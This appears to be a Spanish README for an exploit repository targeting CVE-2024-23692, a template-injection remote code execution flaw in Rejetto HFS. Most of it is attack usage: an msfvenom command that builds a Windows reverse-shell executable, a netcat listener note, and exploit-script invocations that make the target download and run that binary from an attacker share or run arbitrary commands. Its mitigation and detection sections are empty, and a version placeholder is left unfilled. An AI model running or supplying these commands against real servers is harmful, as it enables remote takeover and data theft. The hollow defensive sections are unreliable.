
Rejetto HFS (HTTP File Server) es un servidor web de archivos simple que facilita el intercambio de archivos a través de una red o internet.
Rejetto HFS (HTTP File Server) es un servidor simple de archivos web que facilita el intercambio de archivos a través de una red o internet. A pesar de su facilidad de uso y simplicidad, se ha descubierto una vulnerabilidad crítica (CVE-2024-23692), que convierte al servidor en un objetivo para atacantes.
CVE-2024-23692 es una vulnerabilidad de Inyección de Plantillas del Lado del Servidor (SSTI) identificada en Rejetto HFS. Esta vulnerabilidad permite a un atacante inyectar y ejecutar plantillas maliciosas en el servidor. Si se explota, puede llevar a la ejecución remota de código, comprometiendo potencialmente todo el servidor y los datos que aloja.
Un atacante que explote esta vulnerabilidad puede:
Obtener una shell usando un binario malicioso creado con msfvenom.
Nota: Deja nc escuchando.
# $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.128 LPORT=1234 -f exe > exploit.exe
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 //192.168.198.128/kali/exploit.exe
![[Screenshot_1.png]](https://github.com/Mr-r00t11/CVE-2024-23692/blob/main/img/Screenshot_1.png)
Ejecutar un comando remotamente.
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 systeminfo
Puede tardar aproximadamente 15 segundos en mostrar el resultado.
![[Screenshot_2.png]](https://github.com/Mr-r00t11/CVE-2024-23692/blob/main/img/Screenshot_2.png)
Todas las versiones de Rejetto HFS hasta e incluyendo la versión [insertar la última versión vulnerable aquí] están afectadas por esta vulnerabilidad.
Para mitigar el riesgo que plantea CVE-2024-23692, se recomienda a los usuarios:
Para determinar si tu servidor ha sido comprometido, busca:
Para obtener más asistencia y soporte, consulta los foros de la comunidad de Rejetto HFS o los canales oficiales de soporte.
Este proyecto está bajo la licencia MIT - consulta el archivo LICENSE para más detalles.